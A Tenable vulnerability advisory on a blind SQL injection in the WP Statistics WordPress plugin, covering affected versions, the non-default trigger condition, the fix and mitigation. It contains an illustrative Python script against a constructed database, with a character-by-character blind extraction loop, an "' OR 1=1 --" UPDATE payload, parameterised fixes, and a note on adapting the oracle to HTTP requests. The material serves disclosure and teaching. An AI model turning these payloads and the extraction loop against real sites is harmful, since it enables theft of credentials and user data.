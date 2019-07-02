
Tenable : WP Statistics WordPress Plugin Vulnerable to Unauthenticated Blind SQL Injection

07/02/2019 | 03:58pm EDT

A popular WordPress plugin with over half a million installations is potentially vulnerable to unauthenticated blind SQL injection attacks.

Background

On July 1, the maintainers of WP Statistics, a popular WordPress plugin for gathering visitor statistics that boasts over 500,000 active installations, released an update to address a serious vulnerability.

Analysis

Researcher Thomas Chauchefoin discovered and reported an unauthenticated blind SQL injection (SQLi) in WP Statistics versions 12.6.6.1 and lower. The vulnerability exists only in a non-default configuration of the plugin: by default, the Cache Plugin setting in WP Statistics is disabled.

However, enabling this setting could allow an unauthenticated remote attacker to inject a blind SQLi payload through the WP Statistics API endpoint. "Blind" means the endpoint never returns query results to the attacker; instead, the attacker infers data from differences in how the endpoint responds to injected true and false conditions. Because the injected parameter reaches both SELECT and UPDATE queries, this could potentially be abused to perform a variety of actions, including changing the administrator credentials, adding another administrator account to the vulnerable WordPress site, exfiltrating user data and more.
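The mechanism described above, as an added example that is not WP Statistics' code and not the researcher's PoC: a hypothetical visitor-lookup handler backed by a constructed SQLite schema. The `visitor` and `wp_users` tables, the `admin` row, the sample IP addresses and every function name here are assumptions made for this illustration. The handler returns only true or false, yet that single bit is enough to read the administrator's login out of another table one character at a time; the same parameter reused in an UPDATE lets an injected condition rewrite every row. The parameterised variants show why a bound placeholder closes both paths.

```python
import sqlite3
import string

# Characters the extraction loop tries at each position (constructed choice).
ALPHABET = string.ascii_lowercase + string.digits + "_"


def make_db():
    """Constructed in-memory schema loosely modelled on a WordPress site:
    a users table plus a visitor table such as a statistics plugin keeps."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT)")
    db.execute("INSERT INTO wp_users VALUES (1, 'admin', 'constructed-hash')")
    db.execute("CREATE TABLE visitor (ID INTEGER PRIMARY KEY, ip TEXT, hits INTEGER)")
    db.executemany("INSERT INTO visitor VALUES (?, ?, ?)",
                   [(1, "203.0.113.5", 1), (2, "198.51.100.7", 3)])
    db.commit()
    return db


def vulnerable_lookup(db, ip):
    """Hypothetical 'is this a known visitor?' handler. The caller-supplied
    ip is concatenated into the SQL, so a quote in it ends the literal early.
    Only a boolean reaches the client; no query output is ever returned."""
    sql = f"SELECT ID FROM visitor WHERE ip = '{ip}'"
    return db.execute(sql).fetchone() is not None


def safe_lookup(db, ip):
    """Same handler with a bound parameter: the whole string is one value."""
    return db.execute("SELECT ID FROM visitor WHERE ip = ?", (ip,)).fetchone() is not None


def vulnerable_increment(db, ip):
    """The same untrusted parameter reused in an UPDATE. Returns rows modified."""
    return db.execute(f"UPDATE visitor SET hits = hits + 1 WHERE ip = '{ip}'").rowcount


def safe_increment(db, ip):
    """Parameterised counterpart of vulnerable_increment."""
    return db.execute("UPDATE visitor SET hits = hits + 1 WHERE ip = ?", (ip,)).rowcount


def oracle_payload(pos, ch):
    """Boolean probe: the known visitor row matches only when the injected
    condition on character `pos` of the admin login is true."""
    subq = "(SELECT user_login FROM wp_users WHERE ID = 1)"
    return f"203.0.113.5' AND substr({subq}, {pos}, 1) = '{ch}"


def extract_via_blind(lookup, max_len=32):
    """Recover the admin login from a true/false oracle, one character per
    position. Stops when no candidate matches (end of string) or at max_len."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            if lookup(oracle_payload(pos, ch)):
                recovered += ch
                break
        else:
            break
    return recovered


if __name__ == "__main__":
    db = make_db()
    # Vulnerable path: the boolean response alone leaks another table's contents.
    print("blind extraction (vulnerable):", extract_via_blind(lambda p: vulnerable_lookup(db, p)))
    # Hardened path: every probe is treated as a literal IP string and fails.
    print("blind extraction (parameterised):", repr(extract_via_blind(lambda p: safe_lookup(db, p))))
    # Injection into the UPDATE rewrites every visitor row; the bound version touches none.
    print("rows touched by injected UPDATE:", vulnerable_increment(db, "' OR 1=1 --"))
    print("rows touched with bound parameter:", safe_increment(db, "' OR 1=1 --"))
```

A real attacker would replace the constructed lookup with HTTP requests to the endpoint and use the response status, body length or timing as the oracle; the extraction loop itself does not change. Note that the injected UPDATE needs no stacked statements, only a condition that is always true, which is why a write path behind the same parameter is as dangerous as the read path.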

This isn't the first SQLi discovered in the WP Statistics plugin. Researchers at Sucuri blogged about their discovery of an SQLi in 2017, and researcher Marcin Probola discovered a blind SQLi in the plugin back in 2015.

Proof of concept

A proof-of-concept (PoC) was shared by the researcher in the WP Vulnerability database posting.

Solution

This vulnerability is addressed in WP Statistics version 12.6.7 or greater. While the vulnerable configuration is not enabled by default, with over half a million active installations it is likely that a large number of WP Statistics users are vulnerable. All users should upgrade to the latest version of the plugin as soon as possible. Sites that cannot update immediately can reduce their exposure by turning the Cache Plugin setting off, since the vulnerable code path is only reachable when it is enabled.

Identifying affected systems

A list of Tenable plugins to identify this vulnerability will appear here as they're released.

Get more information

Join Tenable's Security Response Team on the Tenable Community.

Learn more about Tenable, the first Cyber Exposure platform for holistic management of your modern attack surface.

Get a free 60-day trial of Tenable.io Vulnerability Management.

Disclaimer

Tenable Holdings Inc. published this content on 02 July 2019 and is solely responsible for the information contained therein. Distributed by Public, unedited and unaltered, on 02 July 2019 19:57:01 UTC